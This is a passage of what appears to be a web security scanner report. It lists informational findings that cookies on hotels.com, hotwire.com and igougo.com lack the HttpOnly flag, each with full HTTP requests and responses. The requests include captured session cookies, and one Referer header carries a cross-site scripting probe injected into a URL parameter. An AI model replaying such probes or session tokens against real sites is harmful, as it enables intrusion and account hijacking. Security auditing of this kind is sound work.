X-TeaLeaf-UIEventCapture-Version: 2011.07.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /search.do
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

<ClientEventSet PostTimeStamp="1317600763816" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="63175" DateSince1970="1317600617958" PageId="ID19H9M14S783R0.4504159395582974" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:13:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:13:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

14.251. http://www.hotels.com/search.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotels&grp=9702&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B222113440%3B45762978%3Bg%3Fhttp%3A%2F%2Fwww.hotels.com%2FPPCSearch%3Fcity%3D%24%7Bcity%7D%2C%24%7Bstate%7D%26arrivalDate%3D%24%7BdepartureDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26adultsPerRoom%3D2%26numberOfRooms%3D%24%7Brooms%7D%26departureDate%3D%24%7BreturnDate%3Ad%3A%22dd%2Fmm%2Fyyyy%22%7D%26PSRC%3DIGOUGO%26rffrid%3Dmdp.hcom.US.138.160.02&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=150&pos=3&aii=2fc59ddf-790d-4415-832a-eafa2c6a46cb&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:04 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=ZgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:04 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:04 GMT; Path=/
Content-Length: 368925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...

14.252. http://www.hotels.com/search/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /search/search.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=PfwAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A130.1.1.i2%3A103.4.1.i6%3A171.1.0%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//"; user=RCoxODUuMC4wLmkxOjExNC4xLjA6MTI0LjEuMC5pMToxMzAuMS4xLmkyOjEwMy40LjEuaTY6MTcxLjEuMDo0OC4xLjA6OTcuNzMuMS5pMzo5OC42LjQ6MTQyLjAuMC5pNDoxOTguMi4wOjE0NS4wLjAuaTI6MjAwLjAuMDoxMzcuMC4wLmkyOjEwOC4xLjAuaTI6MTkwLjMuMDoxNTIuMC4wLmkyOjEzNC4wLjE6MTk2LjEuMDoyLjIuMToyMDkuMC4xOjE0Ny42LjAuaTY6OTIuMC4wLmkxOjEyMS41MDMuMC5pNzoxMzIuMi4wLmkyOjEyMi4xLjAuaTM6MTM4LjEuMDoxNDkuMC4wLmkxOjEwNC4wLjE6MTk1LjAuMHxIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDIhRio.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=DvwAAAAAAAEAAAAAAAAAAAAAAAMAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:34 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Set-Cookie: user=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.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:34 GMT; Path=/
Content-Length: 371034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...

14.253. http://www.hotels.com/selectors/en_US/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /selectors/en_US/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /selectors/en_US/ HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; SSLB=1; SSPV=LTwAAAAAAAEAAAAAAAAAAAAAAAEAAAAAAAA; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMSUzQTExNC4xLjAlM0ExMjQuMS4wLmkxJTNBMTAzLjQuMS5pNiUzQTE3MS4xLjAlM0ExMzAuMS4xLmkyJTNBNDguMS4wJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTE0Mi4wLjAuaTQlM0ExOTguMi4wJTNBMTQ1LjAuMC5pMiUzQTIwMC4wLjAlM0ExMzcuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE5MC4zLjAlM0ExNTIuMC4wLmkyJTNBMTM0LjAuMSUzQTE5Ni4xLjAlM0EyLjIuMSUzQTIwOS4wLjElM0ExNDcuNi4wLmk2JTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTMyLjIuMC5pMiUzQTEyMi4xLjAuaTMlM0ExMzguMS4wJTNBMTQ5LjAuMC5pMSUzQTEwNC4wLjElM0ExOTUuMC4wJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MjoyMDU1NDN8MTQvMTAvMjAxMXwxNi8xMC8yMDExfDI.

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 01:02:44 GMT
Content-Length: 36464
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 01:02:44 GMT
Set-Cookie: mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A84.0.0.i2%3A98.6.4%3A142.0.0.i4%3A119.0.2.i2%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A78.0.1%3A147.0.1.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A184.0.0.i1%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/
Set-Cookie: user=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.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 01:02:44 GMT; Path=/

<headerFooterAdditionalData>
<languageSelectorContent>
<group id="site_group_africa_middle_east">
<![CDATA[
<div class="heading">Africa/Middle East</div>
<ul>

...[SNIP]...

14.254. http://www.hotwire.com/hotel/results.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/results.jsp?searchTokenId=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=974DB21E0DA548F45875D88836CCB561; SaneID=974DB21E0DA548F45875D88836CCB56; hotwireLogin=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; auth=true; NSC_qspe-xxx-qfstjtu=ffffffffaf131c8e45525d5f4f58455e445a4a422d6f

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Set-Cookie: gsc=3; Expires=Mon, 03-Oct-2011 06:59:59 GMT; Path=/
Set-Cookie: hotwireLogin=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; Expires=Tue, 02-Oct-2012 00:38:25 GMT; Path=/
Set-Cookie: hotwirePageModuleState=pgoodCode=H&searchTokenId=1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 288536


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="Content-Language" content="en-us"/>
<meta http-equ
...[SNIP]...

14.255. http://www.hotwire.com/hotel/search-options.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/search-options.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/search-options.jsp?sid=S250&bid=B260711&inputId=hotel-index&destCity=bos&startDay=09&startMonth=10&endDay=16&endMonth=10&noOfAdults=1&numRooms=1 HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: hotwireLogin=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; Expires=Tue, 02-Oct-2012 00:37:52 GMT; Path=/
Set-Cookie: gsc=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: auth=true; Path=/
Location: /hotel/search-options.jsp?numRooms=1&endDay=16&startDay=09&noOfAdults=1&startMonth=10&endMonth=10&destCity=bos&inputId=hotel-index
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:52 GMT
Content-Length: 152

<html><head><title>301 Permanently</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved Permanently.</p>
</body></html>

14.256. http://www.igougo.com/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179047228.1875149061.1317601642.1317601642.1317603064.1; __utmz=179047228.1317601644.1.1.utmcsr=travelocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/popWindow2; SAVId=vid%3Dx1w62AsKbKCFg85jBBCxmj34ktjbYQjD%3Bnvid%3D1%3Bcvid%3D0%3Bpdx%3D24%3Bgdx%3D0%3Bplen%3D24%3Bpid%3D4257dc4c10e6095c8b4692e01f48b912d%3Bpt%3D0%3B; ASP.NET_SessionId=vxlwukrxaiv2ngqs5gwhjc55; UUIDCookie=bf5d4206cc2e4f92b1371f395729999f; SL_Audience=674|Accelerated|285|12|0; SL_UVId=2BC47F12FA5D4186; SL_NV12=1|12; __utmx=179047228.; __utmxx=179047228.; __unam=3de0670-132c72d397d-d7082d6-5; mbox=PC#1317601622475-177474.19#1318816337|check#true#1317606797|session#1317606736569-208906#1317608597

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47F12FA5D4186;path=/;
X-SL-CompState: Uncompiled
X-Strangeloop: ViewState,Compression
Content-Length: 40510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   

<meta http-equiv="X-UA-Compatible" content="IE=Emulate
...[SNIP]...

14.257. http://www.igougo.com/traveldeals/ratefinder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igougo.com
Path:   /traveldeals/ratefinder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011 HTTP/1.1
Host: www.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 00:27:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SL_UVId=2BC47C1462303C7A;path=/;
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Content-Length: 78193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- Google Website Optimizer Control Script -->
<script
...[SNIP]...

14.258. http://www.luminate.com/widget/53d1ac1014/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /widget/53d1ac1014/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widget/53d1ac1014/ HTTP/1.1
Host: www.luminate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:50:23 GMT
Server: Apache
